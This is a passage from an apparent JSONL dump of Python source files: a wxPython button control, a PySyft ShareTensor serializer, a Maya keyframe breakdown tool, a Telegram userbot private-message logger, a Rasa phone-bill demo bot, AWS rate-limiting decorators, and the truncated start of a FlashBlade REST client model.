pressing the mouse button.\n \"\"\"\n if self._selected is not None:\n self.CaptureMouse() \n self._button_down = True\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the user clicking the control: \n #---------------------------------------------------------------------------\n \n def _on_left_up ( self, event = None ):\n \"\"\" Handles the user clicking the control.\n \"\"\"\n need_refresh = self._button_down\n if need_refresh:\n self.ReleaseMouse() \n self._button_down = False\n \n if self._selected is not None:\n wdx, wdy = self.GetClientSizeTuple()\n x = event.GetX()\n y = event.GetY()\n if (0 <= x < wdx) and (0 <= y < wdy):\n if self._selected != -1:\n self.Selected( True )\n elif need_refresh:\n self.Refresh()\n if self._handler is not None:\n self._handler( self )\n return\n \n if need_refresh:\n self.Refresh()\n \n #---------------------------------------------------------------------------\n # Handles the control being re-painted: \n #---------------------------------------------------------------------------\n \n def _on_paint ( self, event = None ):\n \"\"\" Handles the control being re-painted.\n \"\"\"\n wdc = wx.PaintDC( self )\n wdx, wdy = self.GetClientSizeTuple()\n bitmap = self._bitmap\n bdx = bitmap.GetWidth()\n bdy = bitmap.GetHeight()\n wdc.DrawBitmap( bitmap, (wdx - bdx) / 2, (wdy - bdy) / 2, True )\n \n pens = [ self._selectedPenLight, self._selectedPenDark ]\n bd = self._button_down\n if self._mouse_over:\n wdc.SetBrush( wx.TRANSPARENT_BRUSH )\n wdc.SetPen( pens[ bd ] )\n wdc.DrawLine( 0, 0, wdx, 0 ) \n wdc.DrawLine( 0, 1, 0, wdy )\n wdc.SetPen( pens[ 1 - bd ] )\n wdc.DrawLine( wdx - 1, 1, wdx - 1, wdy )\n wdc.DrawLine( 1, wdy - 1, wdx - 1, wdy - 1 )\n \n if self._selected == True:\n wdc.SetBrush( wx.TRANSPARENT_BRUSH )\n wdc.SetPen( pens[ bd ] )\n wdc.DrawLine( 1, 1, wdx - 1, 1 )\n wdc.DrawLine( 1, 1, 1, wdy - 1 )\n wdc.DrawLine( 2, 2, wdx - 2, 2 )\n wdc.DrawLine( 2, 2, 2, wdy - 2 )\n wdc.SetPen( pens[ 1 - bd ] )\n wdc.DrawLine( wdx - 2, 2, wdx - 2, wdy - 1 )\n wdc.DrawLine( 2, wdy - 2, wdx - 2, wdy - 2 )\n wdc.DrawLine( wdx - 3, 3, wdx - 3, wdy - 2 )\n wdc.DrawLine( 3, wdy - 3, wdx - 3, wdy - 3 ) \n\n"} {"ext": "py", "sha": "1a2f7e6f28d7911cef3cc3f506e871b8705a0374", "content": "# stdlib\n\n# stdlib\nimport dataclasses\nfrom uuid import UUID\n\n# third party\nimport sympc\nfrom sympc.config import Config\nfrom sympc.tensor import ShareTensor\n\n# syft absolute\nimport syft\n\n# syft relative\nfrom ...generate_wrapper import GenerateWrapper\nfrom ...proto.lib.sympc.share_tensor_pb2 import ShareTensor as ShareTensor_PB\nfrom ..python.primitive_factory import PrimitiveFactory\n\n\ndef object2proto(obj: object) -> ShareTensor_PB:\n share: ShareTensor = obj\n\n session_uuid = \"\"\n config = {}\n\n if share.session_uuid is not None:\n session_uuid = str(share.session_uuid)\n\n config = dataclasses.asdict(share.config)\n session_uuid_syft = session_uuid\n conf_syft = syft.serialize(\n PrimitiveFactory.generate_primitive(value=config), to_proto=True\n )\n proto = ShareTensor_PB(session_uuid=session_uuid_syft, config=conf_syft)\n\n tensor_data = getattr(share.tensor, \"data\", None)\n if tensor_data is not None:\n proto.tensor.CopyFrom(syft.serialize(share.tensor, to_proto=True))\n\n return proto\n\n\ndef proto2object(proto: ShareTensor_PB) -> ShareTensor:\n if proto.session_uuid:\n session = sympc.session.get_session(proto.session_uuid)\n if session is None:\n raise ValueError(f\"The session {proto.session_uuid} could not be found\")\n\n config = dataclasses.asdict(session.config)\n else:\n config = syft.deserialize(proto.config, from_proto=True)\n\n tensor = syft.deserialize(proto.tensor, from_proto=True)\n share = ShareTensor(data=None, config=Config(**config))\n\n if proto.session_uuid:\n share.session_uuid = UUID(proto.session_uuid)\n\n # Manually put the tensor since we do not want to re-encode it\n share.tensor = tensor\n\n return share\n\n\nGenerateWrapper(\n wrapped_type=ShareTensor,\n import_path=\"sympc.tensor.ShareTensor\",\n protobuf_scheme=ShareTensor_PB,\n type_object2proto=object2proto,\n type_proto2object=proto2object,\n)\n"} {"ext": "py", "sha": "1a2f7f4898f84c6a6a06274e0fa55c407c5cce85", "content": "# -= ml_breakdown.py =-\n# __ by Morgan Loomis\n# ____ ___ / / http://morganloomis.com\n# / __ `__ \\/ / Revision 4\n# / / / / / / / 2018-05-13\n# /_/ /_/ /_/_/ _________\n# /_________/\n# \n# ______________\n# - -/__ License __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Copyright 2018 Morgan Loomis\n# \n# Permission is hereby granted, free of charge, to any person obtaining a copy of \n# this software and associated documentation files (the \"Software\"), to deal in \n# the Software without restriction, including without limitation the rights to use, \n# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the \n# Software, and to permit persons to whom the Software is furnished to do so, \n# subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in all \n# copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS \n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR \n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER \n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN \n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n# \n# ___________________\n# - -/__ Installation __/- - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Copy this file into your maya scripts directory, for example:\n# C:/Documents and Settings/user/My Documents/maya/scripts/ml_breakdown.py\n# \n# Run the tool in a python shell or shelf button by importing the module, \n# and then calling the primary function:\n# \n# import ml_breakdown\n# ml_breakdown.ui()\n# \n# \n# __________________\n# - -/__ Description __/- - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Blend a keyframe or pose with the next or previous keys, essentially creating a\n# breakdown pose that is weighted one way or the other.\n# \n# ____________\n# - -/__ Usage __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# Press the \"Breakdown Dragger\" button to enter the dragger, and the cursor will\n# turn into a hand. Left-click and hold in the viewport, and then drag either left\n# or right to weight the key to the next or previous key. Press and hold the\n# middle mouse button to weight the key toward or away from the average of the\n# surrounding keys. Alternately, set the slider to the desired weight, and press\n# the Next, Previous or Average buttons to increment the breakdown. Right click\n# the buttons to assign to hotkeys. If you have no keys selected, the tool will\n# act only on curves that are visibile in the graph editor. If there are no keys\n# at the current frame, keys will be set.\n# \n# ____________\n# - -/__ Video __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# http://www.youtube.com/watch?v=D8yD4zbHTP8\n# \n# _________\n# - -/__ Ui __/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# [Breakdown Dragger] : Drag in the viewport to weight a breakdown toward the next or previous frame.\n# [<<] : Weight toward the previous frame.\n# [Average] : Weight toward the average of the next and previous frame.\n# [>>] : Weight toward the next frame.\n# \n# ___________________\n# - -/__ Requirements __/- - - - - - - - - - - - - - - - - - - - - - - - - - \n# \n# This script requires the ml_utilities module, which can be downloaded here:\n# https://raw.githubusercontent.com/morganloomis/ml_tools/master/ml_utilities.py\n# \n# __________\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - /_ Enjoy! _/- - -\n\n__author__ = 'Morgan Loomis'\n__license__ = 'MIT'\n__revision__ = 4\n__category__ = 'animation'\n\nshelfButton = {'annotation': 'Click to weight keys by dragging, double click to open UI.',\n 'command': 'import ml_breakdown;ml_breakdown.drag()',\n 'doubleClickCommand': 'import ml_breakdown;ml_breakdown.ui()',\n 'imageOverlayLabel': 'BD',\n 'menuItem': [['Breakdown UI', 'import ml_breakdown;ml_breakdown.ui()'],\n ['<< Previous', 'import ml_breakdown;ml_breakdown.weightPrevious()'],\n ['>> Next', 'import ml_breakdown;ml_breakdown.weightNext()'],\n ['Average', 'import ml_breakdown;ml_breakdown.weightAverage()']],\n 'order': 12}\n\nimport maya.cmds as mc\nfrom maya import OpenMaya\nfrom functools import partial\n\ntry:\n import ml_utilities as utl\n utl.upToDateCheck(32)\nexcept ImportError:\n result = mc.confirmDialog( title='Module Not Found', \n message='This tool requires the ml_utilities module. Once downloaded you will need to restart Maya.', \n button=['Download Module','Cancel'], \n defaultButton='Cancel', cancelButton='Cancel', dismissString='Cancel' )\n \n if result == 'Download Module':\n mc.showHelp('http://morganloomis.com/tool/ml_utilities/',absolute=True)\n\ndef ui():\n '''\n User interface for breakdown\n '''\n\n with utl.MlUi('ml_breakdown', 'Breakdown Tools', width=400, height=180, info='''Select objects.\nPress Breakdown Dragger to create a new key and weight it by dragging in the viewport.\nOtherwise use the increment buttons to nudge a key's value toward the next or previous key.''') as win:\n\n win.buttonWithPopup(label='Breakdown Dragger', command=drag, annotation='Drag in the viewport to weight a breakdown toward the next or previous frame.',\n shelfLabel='BDD')\n\n mc.separator(height=20)\n mc.floatSliderGrp('ml_breakdown_value_floatSlider', value=0.2, field=True, minValue=0, maxValue=2)\n mc.paneLayout(configuration='vertical3',separatorThickness=1)\n win.ButtonWithPopup(label='<<', command=weightPrevious, annotation='Weight toward the previous frame.', shelfLabel='<', shelfIcon='defaultTwoStackedLayout',\n readUI_toArgs={'weight':'ml_breakdown_value_floatSlider'})\n win.ButtonWithPopup(label='Average', command=weightAverage, annotation='Weight toward the average of the next and previous frame.', shelfLabel='><', shelfIcon='defaultTwoStackedLayout',\n readUI_toArgs={'weight':'ml_breakdown_value_floatSlider'})\n win.ButtonWithPopup(label='>>', command=weightNext, annotation='Weight toward the next frame.', shelfLabel='>', shelfIcon='defaultTwoStackedLayout',\n readUI_toArgs={'weight':'ml_breakdown_value_floatSlider'})\n\n\ndef quickBreakDownUI():\n winName = 'ml_quickBreakdownWin'\n if mc.window(winName, exists=True):\n mc.deleteUI(winName)\n\n mc.window(winName, title='ml :: QBD', iconName='Quick Breakdown', width=100, height=500)\n\n mc.columnLayout(adj=True)\n\n mc.paneLayout(configuration='vertical2', separatorThickness=1)\n mc.text('<<')\n mc.text('>>')\n mc.setParent('..')\n\n for v in (10,20,50,80,90,100,110,120,150):\n mc.paneLayout(configuration='vertical2',separatorThickness=1)\n\n mc.button(label=str(v)+' %', command=partial(weightPrevious,v/100.0))\n mc.button(label=str(v)+' %', command=partial(weightNext,v/100.0))\n mc.setParent('..')\n\n mc.showWindow(winName)\n\n mc.window(winName, edit=True, width=100, height=250)\n\n\ndef drag(*args):\n '''The primary command to run the tool'''\n BreakdownDragger()\n\n\ndef weightPrevious(weight=0.2, *args):\n weightBreakdownStep(direction='previous', weight=weight)\n\n\ndef weightAverage(weight=0.2, *args):\n weightBreakdownStep(direction='average', weight=weight)\n\n\ndef weightNext(weight=0.2, *args):\n weightBreakdownStep(direction='next', weight=weight)\n\n\ndef weightBreakdownStep(direction='next', weight=0.2):\n\n keySel = utl.KeySelection()\n if keySel.selectedKeys():\n pass\n elif keySel.visibleInGraphEditor():\n keySel.setKeyframe()\n elif keySel.keyedChannels():\n keySel.setKeyframe()\n\n if not keySel.curves:\n return\n\n times = list()\n values = list()\n\n data = list()\n\n for curve in keySel.curves:\n if keySel.selected:\n times = mc.keyframe(curve, query=True, timeChange=True, sl=True)\n values = mc.keyframe(curve, query=True, valueChange=True, sl=True)\n else:\n times = [keySel.time]\n values = mc.keyframe(curve, time=keySel.time, query=True, valueChange=True)\n\n for i,v in zip(times,values):\n nextTime = mc.findKeyframe(curve, time=(i,), which='next')\n n = mc.keyframe(curve, time=(nextTime,), query=True, valueChange=True)[0]\n prevTime = mc.findKeyframe(curve, time=(i,), which='previous')\n p = mc.keyframe(curve, time=(prevTime,), query=True, valueChange=True)[0]\n\n data.append([curve,i,v,n,p])\n\n for d in data:\n\n value = None\n if direction == 'next':\n value = d[2]+((d[3]-d[2])*weight)\n elif direction == 'previous':\n value = d[2]+((d[4]-d[2])*weight)\n elif direction == 'average':\n value = d[2]+(((d[3]+d[4])/2-d[2])*weight)\n else: break\n\n mc.keyframe(d[0], time=(d[1],), valueChange=value)\n\n\nclass BreakdownDragger(utl.Dragger):\n '''Creates the tool and manages the data'''\n\n def __init__(self,\n name='mlBreakdownDraggerContext',\n minValue=None,\n maxValue=None,\n defaultValue=0,\n title = 'Breakdown'):\n\n self.keySel = utl.KeySelection()\n if self.keySel.selectedKeys():\n pass\n elif self.keySel.visibleInGraphEditor():\n self.keySel.setKeyframe()\n elif self.keySel.keyedChannels():\n self.keySel.setKeyframe()\n\n if not self.keySel.curves:\n return\n\n utl.Dragger.__init__(self, defaultValue=defaultValue, minValue=minValue, maxValue=maxValue, name=name, title=title)\n\n\n #setup tangent type\n itt,ott = utl.getHoldTangentType()\n\n self.time = dict()\n self.value = dict()\n self.next = dict()\n self.prev = dict()\n self.average = dict()\n\n for curve in self.keySel.curves:\n if self.keySel.selected:\n self.time[curve] = mc.keyframe(curve, query=True, timeChange=True, sl=True)\n self.value[curve] = mc.keyframe(curve, query=True, valueChange=True, sl=True)\n else:\n self.time[curve] = self.keySel.time\n self.value[curve] = mc.keyframe(curve, time=self.keySel.time, query=True, valueChange=True)\n\n self.next[curve] = list()\n self.prev[curve] = list()\n self.average[curve] = list()\n\n for i in self.time[curve]:\n next = mc.findKeyframe(curve, time=(i,), which='next')\n prev = mc.findKeyframe(curve, time=(i,), which='previous')\n n = mc.keyframe(curve, time=(next,), query=True, valueChange=True)[0]\n p = mc.keyframe(curve, time=(prev,), query=True, valueChange=True)[0]\n\n self.next[curve].append(n)\n self.prev[curve].append(p)\n self.average[curve].append((n+p)/2)\n\n #set the tangents on this key, and the next and previous, so they flatten properly\n mc.keyTangent(curve, time=(i,), itt=itt, ott=ott)\n mc.keyTangent(curve, time=(next,), itt=itt)\n mc.keyTangent(curve, time=(prev,), ott=ott)\n\n self.setTool()\n self.drawString('Left: Weight Prev/Next, Middle: Weight Average')\n OpenMaya.MGlobal.displayWarning('Left: Weight Prev/Next, Middle: Weight Average')\n\n\n def dragLeft(self):\n '''This is activated by the left mouse button, and weights to the next or previous keys.'''\n\n #clamp it\n if self.x < -1:\n self.x = -1\n if self.x > 1:\n self.x = 1\n\n if self.x > 0:\n self.drawString('>> '+str(int(self.x*100))+' %')\n for curve in self.keySel.curves:\n for i,v,n in zip(self.time[curve],self.value[curve],self.next[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((n-v)*self.x))\n elif self.x <0:\n self.drawString('<< '+str(int(self.x*-100))+' %')\n for curve in self.keySel.curves:\n for i,v,p in zip(self.time[curve],self.value[curve],self.prev[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((p-v)*(-1*self.x)))\n\n\n def dragMiddle(self):\n '''This is activated by the middle mouse button, and weights to the average of the surrounding keys.'''\n\n #clamp it\n if self.x < -1:\n self.x = -1\n if self.x > 1:\n self.x = 1\n\n self.drawString('Average '+str(int(self.x*100))+' %')\n for curve in self.keySel.curves:\n for i,v,n in zip(self.time[curve],self.value[curve],self.average[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((n-v)*self.x))\n\n\n def dragShiftLeft(self):\n '''This is activated by Shift and the left mouse button, and weights to the next or previous keys, without clamping.'''\n if self.x > 0:\n self.drawString('>> '+str(int(self.x*100))+' %')\n for curve in self.keySel.curves:\n for i,v,n in zip(self.time[curve],self.value[curve],self.next[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((n-v)*self.x))\n elif self.x <0:\n self.drawString('<< '+str(int(self.x*-100))+' %')\n for curve in self.keySel.curves:\n for i,v,p in zip(self.time[curve],self.value[curve],self.prev[curve]):\n mc.keyframe(curve, time=(i,), valueChange=v+((p-v)*(-1*self.x)))\n\n\nif __name__ == '__main__':\n quickBreakDownUI()\n\n# ______________________\n# - -/__ Revision History __/- - - - - - - - - - - - - - - - - - - - - - - -\n#\n# Revision 1: 2015-05-13 : First publish.\n#\n# Revision 2: 2015-05-13 : Documentation updates.\n#\n# Revision 3: 2018-02-17 : Updating license to MIT.\n#\n# Revision 4: 2018-05-13 : shelf support"} {"ext": "py", "sha": "1a2f7fb634fc3850ddf798a231305847e25ec0e1", "content": "import asyncio\nimport io\nimport userbot.plugins.sql_helper.no_log_pms_sql as no_log_pms_sql\nfrom telethon import events, errors, functions, types\nfrom userbot.utils import admin_cmd\nfrom userbot.uniborgConfig import Config\n\n\n\n@borg.on(admin_cmd(pattern=\"nccreatedch\"))\nasync def create_dump_channel(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n result = await borg(functions.channels.CreateChannelRequest( # pylint:disable=E0602\n title=f\"UniBorg-{borg.uid}-PM_LOGGR_BOT_API_ID-data\",\n about=\"PM_LOGGR_BOT_API_ID // Do Not Touch\",\n megagroup=False\n ))\n logger.info(result)\n created_chat_id = result.chats[0].id\n result = await borg.edit_admin( # pylint:disable=E0602\n entity=created_chat_id,\n user=Config.TG_BOT_USER_NAME_BF_HER,\n is_admin=True,\n title=\"Editor\"\n )\n logger.info(result)\n with io.BytesIO(str.encode(str(created_chat_id))) as out_file:\n out_file.name = \"PLEASE.IGNORE.dummy.file\"\n await borg.send_file(\n created_chat_id,\n out_file,\n force_document=True,\n allow_cache=False,\n caption=f\"Please set `PM_LOGGR_BOT_API_ID` to `{created_chat_id}`\",\n reply_to=1\n )\n await event.delete()\n else:\n await event.edit(f\"**is configured**. [please do not touch](https://t.me/c/{Config.PM_LOGGR_BOT_API_ID}/2)\")\n\n\n@borg.on(admin_cmd(pattern=\"nolog ?(.*)\"))\nasync def set_no_log_p_m(event):\n if Config.PM_LOGGR_BOT_API_ID is not None:\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if not no_log_pms_sql.is_approved(chat.id):\n no_log_pms_sql.approve(chat.id)\n await event.edit(\"Won't Log Messages from this chat\")\n await asyncio.sleep(3)\n await event.delete()\n\n\n@borg.on(admin_cmd(pattern=\"enlog ?(.*)\"))\nasync def set_no_log_p_m(event):\n if Config.PM_LOGGR_BOT_API_ID is not None:\n reason = event.pattern_match.group(1)\n chat = await event.get_chat()\n if event.is_private:\n if no_log_pms_sql.is_approved(chat.id):\n no_log_pms_sql.disapprove(chat.id)\n await event.edit(\"Will Log Messages from this chat\")\n await asyncio.sleep(3)\n await event.delete()\n \n \n \n@borg.on(events.NewMessage(incoming=True))\nasync def on_new_private_message(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n\n if not event.is_private:\n return\n\n message_text = event.message.message\n message_media = event.message.media\n message_id = event.message.id\n message_to_id = event.message.to_id\n chat_id = event.chat_id\n # logger.info(chat_id)\n\n sender = await borg.get_entity(chat_id)\n if chat_id == borg.uid:\n # don't log Saved Messages\n return\n if sender.bot:\n # don't log bots\n return\n if sender.verified:\n # don't log verified accounts\n return\n\n if not no_log_pms_sql.is_approved(chat_id):\n # log pms\n await do_log_pm_action(chat_id, message_text, message_media)\n\n\n@borg.on(events.ChatAction(blacklist_chats=Config.UB_BLACK_LIST_CHAT))\nasync def on_new_chat_action_message(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n # logger.info(event.stringify())\n chat_id = event.chat_id\n message_id = event.action_message.id\n\n if event.created or event.user_added:\n added_by_users = event.action_message.action.users\n if borg.uid in added_by_users:\n added_by_user = event.action_message.from_id\n # someone added me to chat\n the_message = \"\"\n the_message += \"#MessageActionChatAddUser\\n\\n\"\n the_message += f\"[User](tg://user?id={added_by_user}): `{added_by_user}`\\n\"\n the_message += f\"[Private Link](https://t.me/c/{chat_id}/{message_id})\\n\"\n await borg.send_message(\n entity=Config.PM_LOGGR_BOT_API_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n # file=message_media,\n silent=True\n )\n\n\n@borg.on(events.Raw())\nasync def on_new_channel_message(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n if tgbot is None:\n return\n # logger.info(event.stringify())\n if isinstance(event, types.UpdateChannel):\n channel_id = event.channel_id\n message_id = 2\n # someone added me to channel\n # TODO: https://t.me/TelethonChat/153947\n the_message = \"\"\n the_message += \"#MessageActionChatAddUser\\n\\n\"\n # the_message += f\"[User](tg://user?id={added_by_user}): `{added_by_user}`\\n\"\n the_message += f\"[Private Link](https://t.me/c/{channel_id}/{message_id})\\n\"\n await borg.send_message(\n entity=Config.PM_LOGGR_BOT_API_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n # file=message_media,\n silent=True\n )\n\n\n\"\"\"@borg.on(events.Raw())\nasync def _(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n if tgbot is None:\n return\n logger.info(event.stringify())\"\"\"\n\n\n\"\"\"if tgbot is not None:\n @tgbot.on(events.Raw())\n async def _(event):\n if Config.PM_LOGGR_BOT_API_ID is None:\n return\n logger.info(event.stringify())\"\"\"\n\n\nasync def do_log_pm_action(chat_id, message_text, message_media):\n the_message = \"\"\n the_message += \"#LOG_PMs\\n\\n\"\n the_message += f\"[User](tg://user?id={chat_id}): {chat_id}\\n\"\n the_message += f\"Message: {message_text}\\n\"\n # the_message += f\"Media: {message_media}\"\n await borg.send_message(\n entity=Config.PM_LOGGR_BOT_API_ID,\n message=the_message,\n # reply_to=,\n # parse_mode=\"html\",\n link_preview=False,\n file=message_media,\n silent=True\n )\n \n"} {"ext": "py", "sha": "1a2f80da119b07d1f38e99b55b0888ac9ab9787b", "content": "# -*- coding: UTF-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport warnings\n\nfrom rasa_core.actions import Action\nfrom rasa_core.agent import Agent\nfrom rasa_core.channels.console import ConsoleInputChannel\nfrom rasa_core.events import SlotSet\nfrom rasa_core.interpreter import RasaNLUInterpreter\nfrom rasa_core.policies.keras_policy import KerasPolicy\nfrom rasa_core.policies.memoization import MemoizationPolicy\n\nlogger = logging.getLogger(__name__)\n\nsupport_search = [\"话费\", \"流量\"]\n\n\ndef extract_item(item):\n \"\"\"\n check if item supported, this func just for lack of train data.\n :param item: item in track, eg: \"流量\"、\"查流量\"\n :return:\n \"\"\"\n if item is None:\n return None\n for name in support_search:\n if name in item:\n return name\n return None\n\n\nclass ActionSearchConsume(Action):\n def name(self):\n return 'action_search_consume'\n\n def run(self, dispatcher, tracker, domain):\n item = tracker.get_slot(\"item\")\n item = extract_item(item)\n if item is None:\n dispatcher.utter_message(\"您好,我现在只会查话费和流量\")\n dispatcher.utter_message(\"你可以这样问我:“帮我查话费”\")\n return []\n\n time = tracker.get_slot(\"time\")\n if time is None:\n dispatcher.utter_message(\"您想查询哪个月的话费?\")\n return []\n # query database here using item and time as key. but you may normalize time format first.\n dispatcher.utter_message(\"好,请稍等\")\n if item == \"流量\":\n dispatcher.utter_message(\"您好,您{}共使用{}二百八十兆,剩余三十兆。\".format(time, item))\n else:\n dispatcher.utter_message(\"您好,您{}共消费二十八元。\".format(time))\n return []\n\n\nclass MobilePolicy(KerasPolicy):\n def model_architecture(self, num_features, num_actions, max_history_len):\n \"\"\"Build a Keras model and return a compiled model.\"\"\"\n from keras.layers import LSTM, Activation, Masking, Dense\n from keras.models import Sequential\n\n n_hidden = 32 # size of hidden layer in LSTM\n # Build Model\n batch_shape = (None, max_history_len, num_features)\n\n model = Sequential()\n model.add(Masking(-1, batch_input_shape=batch_shape))\n model.add(LSTM(n_hidden, batch_input_shape=batch_shape))\n model.add(Dense(input_dim=n_hidden, output_dim=num_actions))\n model.add(Activation(\"softmax\"))\n\n model.compile(loss=\"categorical_crossentropy\",\n optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n logger.debug(model.summary())\n return model\n\n\ndef train_nlu():\n from rasa_nlu.training_data import load_data\n from rasa_nlu.config import RasaNLUModelConfig\n from rasa_nlu.model import Trainer\n from rasa_nlu import config\n\n training_data = load_data(\"data/nlu.json\")\n trainer = Trainer(config.load(\"data/nlu_model_config.json\"))\n trainer.train(training_data)\n model_directory = trainer.persist(\"models/\", project_name=\"ivr\", fixed_model_name=\"demo\")\n\n return model_directory\n\n\ndef train_dialogue(domain_file=\"data/domain.yml\",\n model_path=\"models/dialogue\",\n training_data_file=\"data/stories.md\"):\n from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,\n BinarySingleStateFeaturizer)\n featurizer = MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=5)\n agent = Agent(domain_file,\n policies=[MemoizationPolicy(max_history=5), KerasPolicy(featurizer)])\n\n agent.train(\n training_data_file,\n epochs=200,\n batch_size=16,\n augmentation_factor=50,\n validation_split=0.2\n )\n\n agent.persist(model_path)\n return agent\n\ndef run_ivrbot_online(input_channel=ConsoleInputChannel(),\n interpreter=RasaNLUInterpreter(\"models/ivr/demo\"),\n domain_file=\"data/domain.yml\",\n training_data_file=\"data/stories.md\"):\n from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer,\n BinarySingleStateFeaturizer)\n featurizer = MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=5)\n agent = Agent(domain_file,\n policies=[MemoizationPolicy(max_history=5), KerasPolicy(featurizer)],\n interpreter=interpreter)\n\n agent.train_online(training_data_file,\n input_channel=input_channel,\n batch_size=50,\n epochs=200,\n max_training_samples=300)\n\n return agent\n\n\ndef run(serve_forever=True):\n agent = Agent.load(\"models/dialogue\",\n interpreter=RasaNLUInterpreter(\"models/ivr/demo\"))\n\n if serve_forever:\n agent.handle_channel(ConsoleInputChannel())\n return agent\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=\"INFO\")\n\n parser = argparse.ArgumentParser(\n description=\"starts the bot\")\n\n parser.add_argument(\n \"task\",\n choices=[\"train-nlu\", \"train-dialogue\", \"run\", \"online-train\"],\n help=\"what the bot should do - e.g. run or train?\")\n task = parser.parse_args().task\n\n # decide what to do based on first parameter of the script\n if task == \"train-nlu\":\n train_nlu()\n elif task == \"train-dialogue\":\n train_dialogue()\n elif task == \"run\":\n run()\n elif task == \"online-train\":\n run_ivrbot_online()\n else:\n warnings.warn(\"Need to pass either 'train-nlu', 'train-dialogue', 'run' or 'online-train' to use the script.\")\n exit(1)\n\n"} {"ext": "py", "sha": "1a2f81832ea5fcfcc38240a0cac064b8938c36d2", "content": "\"\"\"\n.. module: cloudaux.aws.decorators\n :platform: Unix\n :copyright: (c) 2018 by Netflix Inc., see AUTHORS for more\n :license: Apache, see LICENSE for more details.\n.. moduleauthor:: Patrick Kelley @monkeysecurity\n.. moduleauthor:: Mike Grima \n\"\"\"\nimport functools\nimport time\n\nimport boto\nimport botocore\n\nRATE_LIMITING_ERRORS = ['Throttling', 'RequestLimitExceeded', 'SlowDown', 'RequestThrottled']\n\n\ndef rate_limited(max_attempts=None, max_delay=4):\n def decorator(f):\n metadata = {\n 'count': 0,\n 'delay': 0\n }\n\n @functools.wraps(f)\n def decorated_function(*args, **kwargs):\n\n def increase_delay(e):\n if metadata['delay'] == 0:\n metadata['delay'] = 1\n elif metadata['delay'] < max_delay:\n metadata['delay'] *= 2\n\n if max_attempts and metadata['count'] > max_attempts:\n raise e\n\n metadata['count'] = 0\n while True:\n metadata['count'] += 1\n if metadata['delay'] > 0:\n time.sleep(metadata['delay'])\n try:\n retval = f(*args, **kwargs)\n metadata['delay'] = 0\n return retval\n except botocore.exceptions.ClientError as e:\n if e.response[\"Error\"][\"Code\"] not in RATE_LIMITING_ERRORS:\n raise e\n increase_delay(e)\n except boto.exception.BotoServerError as e:\n if e.error_code not in RATE_LIMITING_ERRORS:\n raise e\n increase_delay(e)\n\n return decorated_function\n\n return decorator\n\n\ndef paginated(response_key, request_pagination_marker=\"Marker\", response_pagination_marker=\"Marker\"):\n def decorator(func):\n @functools.wraps(func)\n def decorated_function(*args, **kwargs):\n results = []\n\n while True:\n response = func(*args, **kwargs)\n results.extend(response[response_key])\n\n if ('NextMarker' in response) or ('IsTruncated' in response and response['IsTruncated']):\n kwargs.update({request_pagination_marker: response[response_pagination_marker]})\n else:\n break\n return results\n return decorated_function\n return decorator\n"} {"ext": "py", "sha": "1a2f818a19975f04f66148cbe31157a7baa193a8", "content": "# coding: utf-8\n\n\"\"\"\n FlashBlade REST API\n\n A lightweight client for FlashBlade REST API 2.3, developed by Pure Storage, Inc. (http://www.purestorage.com/).\n\n OpenAPI spec version: 2.3\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re\n\nimport six\nimport typing\n\nfrom ....properties import Property\nif typing.TYPE_CHECKING:\n from pypureclient.flashblade.FB_2_3 import models\n\nclass ArrayConnectionResponse(object):\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'items': 'list[ArrayConnection]'\n }\n\n attribute_map = {\n 'items': 'items'\n }\n\n required_args = {\n }\n\n def __init__(\n self,\n items=None, # type: List[models.ArrayConnection]\n ):\n \"\"\"\n Keyword args:\n items (list[ArrayConnection])\n \"\"\"\n if items is not None:\n self.items = items\n\n def __setattr__(self, key, value):\n if key not in self.attribute_map:\n raise KeyError(\"Invalid key `{}` for `ArrayConnectionResponse`\".format(key))\n self.__dict__[key] = value\n\n def __getattribute__(self, item):\n value = object.__getattribute__(self, item)\n if isinstance(value, Property):\n return None\n else:\n 